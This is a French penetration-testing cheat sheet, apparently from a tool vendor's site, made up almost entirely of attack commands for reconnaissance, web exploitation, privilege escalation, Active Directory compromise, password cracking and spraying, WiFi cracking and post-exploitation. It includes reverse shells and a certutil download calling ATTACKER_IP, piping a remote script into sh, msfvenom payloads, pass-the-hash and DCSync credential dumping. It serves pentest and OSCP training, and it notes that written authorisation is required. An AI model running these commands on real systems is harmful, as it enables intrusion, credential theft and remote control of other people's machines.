# Reconnaissance
La collecte d'informations est la base de tout test d'intrusion. Commencez par la recon passive, puis passez au scan actif.
Nmap — Découverte réseau
nmap -sC -sV -oA scan_results TARGET_IP
nmap -p- -T4 --min-rate=1000 TARGET_IP
nmap -sU --top-ports 200 TARGET_IP
nmap --script vuln TARGET_IP
Énumération de sous-domaines & DNS
subfinder -d TARGET_DOMAIN -o subdomains.txt
amass enum -d TARGET_DOMAIN -o amass_results.txt
dig axfr @DNS_SERVER TARGET_DOMAIN
Brute-force de répertoires & fichiers
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
# Hacking d'Applications Web
Testez les vulnérabilités du Top 10 OWASP : SQLi, XSS, SSRF, IDOR, contournement d'authentification, et plus.
Injection SQL
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
sqlmap -r request.txt --level 5 --risk 3 --batch
XSS (Cross-Site Scripting)
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
SSRF & LFI
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
Burp Suite — Essentiels
curl -x http://127.0.0.1:8080 -k https://TARGET
# Services Réseau
Protocoles et services courants lors des tests d'intrusion : SMB, FTP, SSH, HTTP, SNMP.
Énumération SMB
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP
crackmapexec smb TARGET_IP -u '' -p '' --shares
FTP
ftp TARGET_IP # Essayer anonymous:anonymous
SNMP
snmpwalk -v2c -c public TARGET_IP
# Escalade de Privilèges Linux
Après avoir obtenu un shell, escaladez vers root. Vérifiez les SUID, capabilities, cron jobs et exploits kernel.
Scripts d'énumération
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Binaires SUID
find / -perm -4000 -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Tâches Cron
cat /etc/crontab && ls -la /etc/cron.* && crontab -l
Mauvaise configuration Sudo
sudo -l
/etc/passwd inscriptible
openssl passwd -1 -salt hacker password123
# Escalade de Privilèges Windows
Escaladez d'un utilisateur bas privilège à SYSTEM. Impersonation de tokens, abus de services, chemins non-quotés.
Énumération
winPEASany.exe quiet fast searchfast
whoami /priv
Impersonation de Token
.\GodPotato.exe -cmd "cmd /c whoami"
Chemins de service non-quotés
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# Active Directory
Pentesting AD : énumérer les utilisateurs, kerberoast, AS-REP roast, pass-the-hash, DCSync.
Énumération
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Kerberoasting
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -outputfile asrep.txt
Pass-the-Hash
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH
DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm
# Attaques de Mots de Passe
Cracker des hashes, brute-forcer des services, et pulvériser des identifiants sur le réseau.
Cracking de hashes
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Brute-force en ligne
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
Password Spraying
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
# Post-Exploitation
Après avoir obtenu l'accès : établir la persistance, pivoter, exfiltrer les données.
Transfert de fichiers
python3 -m http.server 8080
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Upgrade de shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Pivoting
chisel server -p 8000 --reverse # Sur l'attaquant
chisel client ATTACKER_IP:8000 R:socks # Sur la cible
# Attaques Sans-fil
Pentesting WiFi : capturer des handshakes, cracker du WPA2, points d'accès pirates.
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
aireplay-ng -0 5 -a BSSID wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Cloud & Kubernetes
Énumérer les assets cloud, exploiter les mauvaises configurations AWS, Azure, GCP et Kubernetes.
AWS
aws sts get-caller-identity
aws s3 ls s3://BUCKET_NAME --no-sign-request
Kubernetes
kubectl get pods --all-namespaces
kubectl auth can-i --list
❓ FAQ Pentesting
Cet aide-mémoire couvre 200+ commandes essentielles utilisées pour l'OSCP et les pentests réels : scan nmap, escalade de privilèges (Linux et Windows), attaques Active Directory, hacking web et post-exploitation.
Les commandes essentielles incluent nmap pour le scan réseau, sqlmap pour l'injection SQL, hashcat/john pour le cracking de mots de passe, les outils impacket pour Active Directory, et linpeas/winpeas pour l'énumération d'escalade de privilèges.
Commencez par les outils de reconnaissance (nmap, subfinder), apprenez les vulnérabilités web (OWASP Top 10), entraînez-vous sur HackTheBox, et utilisez une carte mentale structurée comme Pentest Mindmap pour organiser vos connaissances en 34 catégories.
L'escalade de privilèges consiste à obtenir des permissions plus élevées que celles obtenues initialement. Sous Linux, les vecteurs courants sont les binaires SUID, les mauvaises configurations sudo, les tâches cron et les entrées PATH inscriptibles. Sous Windows : SeImpersonatePrivilege (Potatoes), les chemins de service non entre guillemets et AlwaysInstallElevated.
Les outils clés incluent BloodHound (cartographie des chemins d'attaque), impacket (GetUserSPNs, secretsdump, psexec), crackmapexec (credential spraying), evil-winrm (shells WinRM) et Rubeus (attaques Kerberos). Commencez par cartographier le domaine avec BloodHound pour identifier le chemin le plus court vers Domain Admin.
L'injection SQL est une vulnérabilité web où une entrée contrôlée par l'attaquant est exécutée comme du code SQL. Testez manuellement avec des payloads comme ' OR '1'='1 ou utilisez sqlmap pour une détection automatisée : sqlmap -u 'http://cible/page?id=1' --batch --dbs. Elle peut mener à l'exfiltration de données, au contournement d'authentification ou à l'exécution de code à distance.
L'OWASP Top 10 est une liste standard des risques de sécurité les plus critiques des applications web. En 2021, il inclut : Contrôle d'accès défaillant, Défaillances cryptographiques, Injection (SQLi, XSS), Conception non sécurisée, Mauvaise configuration de sécurité, Composants vulnérables, Défaillances d'authentification, SSRF, et plus. C'est le socle de la méthodologie de pentest web.
Un reverse shell est une connexion où la machine cible initie une connexion vers l'écouteur de l'attaquant. Démarrez un écouteur avec nc -lvnp 4444, puis déclenchez le shell sur la cible : bash -i >& /dev/tcp/IP_ATTAQUANT/4444 0>&1. Générez des payloads pour d'autres langages avec msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.
Le mouvement latéral consiste à pivoter d'un hôte compromis vers d'autres sur le réseau interne. Techniques courantes : Pass-the-Hash avec impacket-psexec, Pass-the-Ticket avec des TGT Kerberos, le forwarding d'agent SSH, et le port forwarding via chisel ou des tunnels SSH. BloodHound cartographie le chemin le plus court vers Domain Admin.
Un scan de vulnérabilités (Nessus, OpenVAS) identifie automatiquement les CVE connues et les mauvaises configurations sans exploitation. Un test d'intrusion va plus loin : le testeur exploite activement les vulnérabilités, escalade les privilèges et démontre un impact métier réel. Les pentests nécessitent une autorisation écrite et un périmètre défini.
📚 Ressources Complémentaires
- Cheatsheet Nmap — Référence complète des options Nmap et techniques de scan réseau
- Cheatsheet OSCP — Commandes et méthodologie pour l'examen OSCP
- Cheatsheet Burp Suite — Proxy, Repeater, Intruder et workflow de pentest web
- Cheatsheet Metasploit — Référence msfconsole, msfvenom et Meterpreter
- Cheatsheet Active Directory — Kerberoasting, BloodHound, mouvement latéral et élévation de privilèges
- Cheatsheet Élévation de Privilèges Linux — SUID, sudo, cron, capabilities et exploits kernel
- Cheatsheet Élévation de Privilèges Windows — Tokens, services non quotés, registre et contournement UAC
- Cheatsheet Reverse Shell — One-liners Bash, Python, netcat, PowerShell et PHP
- Cheatsheet Injection SQL — Payloads UNION, blind, error-based et automatisation sqlmap
- Cheatsheet Hashcat — Modes de hash, types d'attaque, règles et workflows de crack
- Cheatsheet Wireshark — Filtres de capture et d'affichage, analyse de protocoles et forensics
- Glossaire Pentesting — 60+ termes de cybersécurité expliqués pour les hackers éthiques
- Guide : Débuter en Pentesting — Guide pas à pas avec méthodologie et outils
Transformez vos findings en rapport PDF professionnel. L'IA remplit CVE, CVSS et sévérité automatiquement.
Envie de 12 020+ commandes dans une mindmap interactive ?
Cet aide-mémoire ne montre qu'une fraction de ce que Pentest Mindmap offre. 34 catégories, recherche instantanée et copie en 1 clic — organisé en carte mentale interactive.
Créer un compte gratuit →